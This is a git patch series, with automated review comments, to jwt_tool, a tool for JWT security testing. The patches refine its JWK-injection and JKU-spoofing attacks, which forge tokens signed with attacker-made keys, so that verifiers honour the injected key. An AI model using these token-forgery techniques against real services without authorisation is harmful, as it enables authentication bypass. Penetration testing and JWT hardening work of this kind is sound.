From 323ebc9d4c516d3aedb19e7c00e74f7889a26ddd Mon Sep 17 00:00:00 2001
From: Daniel Wilkinson
Date: Fri, 22 Jul 2022 10:23:09 +0100
Subject: [PATCH 1/2] During JWK injection, set kid header to match JWK kid so that the key is used
---
 jwt_tool.py | 1 +
 1 file changed, 1 insertion(+)
diff --git a/jwt_tool.py b/jwt_tool.py
index 23e9c14..bab1afe 100644
--- a/jwt_tool.py
+++ b/jwt_tool.py
@@ -771,6 +771,7 @@ def jwksEmbed(newheadDict, newpaylDict):
 newjwks = buildJWKS(n, e, "jwt_tool")
 newHead["jwk"] = newjwks
 newHead["alg"] = "RS256"
+ newHead["kid"] = newjwks["kid"]
 key = privKey
 # key = RSA.importKey(privKey)
 newContents = genContents(newHead, newpaylDict)
From ac09d07b8fb9c06531fa1aa1e54c8a49f9054b63 Mon Sep 17 00:00:00 2001
From: Daniel Wilkinson
Date: Fri, 22 Jul 2022 12:04:53 +0100
Subject: [PATCH 2/2] Revert kid after JWK injection, and also fix kid for JKU injection
---
 jwt_tool.py | 13 +++++++++++++
 1 file changed, 13 insertions(+)
diff --git a/jwt_tool.py b/jwt_tool.py
index bab1afe..c34cbac 100644
--- a/jwt_tool.py
+++ b/jwt_tool.py
@@ -739,6 +739,7 @@ def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"):
 newjwks = buildJWKS(n, e, kid)
 newHead["jku"] = jku
 newHead["alg"] = "RS256"
+ newHead["kid"] = config["customising"]["jwks_kid"]
 key = RSA.importKey(privKey)
 newContents = genContents(newHead, paylDict)
 newContents = newContents.encode('UTF-8')
@@ -1370,6 +1371,10 @@ def injectOut(newheadDict, newpaylDict):
 def scanModePlaybook():
 cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta")
 origalg = headDict["alg"]
+ try:
+ origkid = headDict["kid"]
+ except:
+ origkid = False # No token
 tmpCookies = config['argvals']['cookies']
 tmpHeader = config['argvals']['header']
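Review bot: The new `newHead["kid"] = newjwks["kid"]` line is the whole point of this commit but carries no explanation, so a later tidy-up could easily drop it as redundant with the embedded `jwk`; a one-line why-comment such as `# mirror the embedded JWK's kid: verifiers that select keys by kid otherwise ignore the injected key` would protect it. The kid written here is presumably the fixed `"jwt_tool"` string handed to buildJWKS on the context line above, which is a recognisable fingerprint in server logs, though buildJWKS itself is not shown so that should be confirmed. jwksEmbed starts and ends outside the hunk.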
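Review bot: The added line sets the header kid from `config["customising"]["jwks_kid"]`, but the JWKS entry built one line above uses the function's own `kid` parameter (`buildJWKS(n, e, kid)`, default `"jwt_tool"`), so whenever a caller passes a different kid, or the config value differs from the default, the header kid and the served key's kid diverge again, which is precisely the mismatch the commit message says it fixes. Taking the value from the same source as the JWKS, `newHead["kid"] = kid` (or `newjwks["kid"]`, as jwksEmbed does in the first patch), keeps the two in lockstep. jwksGen's body starts and ends outside the hunk, so whether any caller passes kid explicitly cannot be seen here.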
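Review bot: Using `origkid = False` as the "no kid" marker conflates an absent header with any falsy value, so a token whose header carries `"kid": ""` (not unusual in the wild) would later take the `else` branch in the restore blocks and have its kid deleted rather than put back, leaving every subsequent playbook step running against a modified header. Recording presence instead of truthiness avoids that: `origkid = headDict.get("kid")` paired with `hadkid = "kid" in headDict`, and restoring on `hadkid` rather than `if origkid:`. The bare `except:` should also be `except KeyError:` so an unrelated failure is not silently read as "no kid", and the trailing `# No token` comment is misleading since the branch means no kid header, not no token. scanModePlaybook continues past the end of the hunk.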
@@ -1419,6 +1424,10 @@ def scanModePlaybook():
 jwksig, jwksContents = jwksEmbed(headDict, paylDict)
 jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)")
 headDict["alg"] = origalg
+ if origkid:
+ headDict["kid"] = origkid
+ else:
+ del headDict["kid"]
 if origjwk:
 headDict["jwk"] = origjwk
 else:
@@ -1431,6 +1440,10 @@ def scanModePlaybook():
 jku = config['services']['jwksloc']
 newContents, newSig = exportJWKS(jku)
 jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+config['services']['jwksloc'])
+ if origkid:
+ headDict["kid"] = origkid
+ else:
+ del headDict["kid"]
 if origjku:
 headDict["jku"] = origjku
 else:
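Review bot: The four-line kid restore added after the `-X i` step is a verbatim copy of the one added to the `-X s` step in the next hunk, and both sit next to structurally identical jwk/jku restore blocks, so every header field the playbook injects now needs yet another copy, which is how the kid drift this commit repairs crept in. A small helper keeps the restore in one place, e.g. `def restoreHeader(headDict, field, orig): headDict[field] = orig if orig else headDict.pop(field, None)` called as `restoreHeader(headDict, "kid", origkid)`; the `pop` form also stops a missing field from raising. The restore assumes jwksEmbed mutates `headDict` in place rather than working on a copy, which is not visible in this hunk; scanModePlaybook starts and ends outside it.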
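Review bot: `del headDict["kid"]` in the added else branch raises KeyError when the original token had no kid and the preceding `exportJWKS(jku)` did not place one on `headDict`; jwksGen does set `newHead["kid"]` in this same patch, but whether exportJWKS reaches jwksGen with `headDict` itself rather than a copy is not visible here, and a KeyError at this point would abort the whole playbook right after the spoof step. `headDict.pop("kid", None)` removes the field when present and is a no-op otherwise, which is the intended "back to the original header" outcome in both cases. scanModePlaybook continues beyond the hunk.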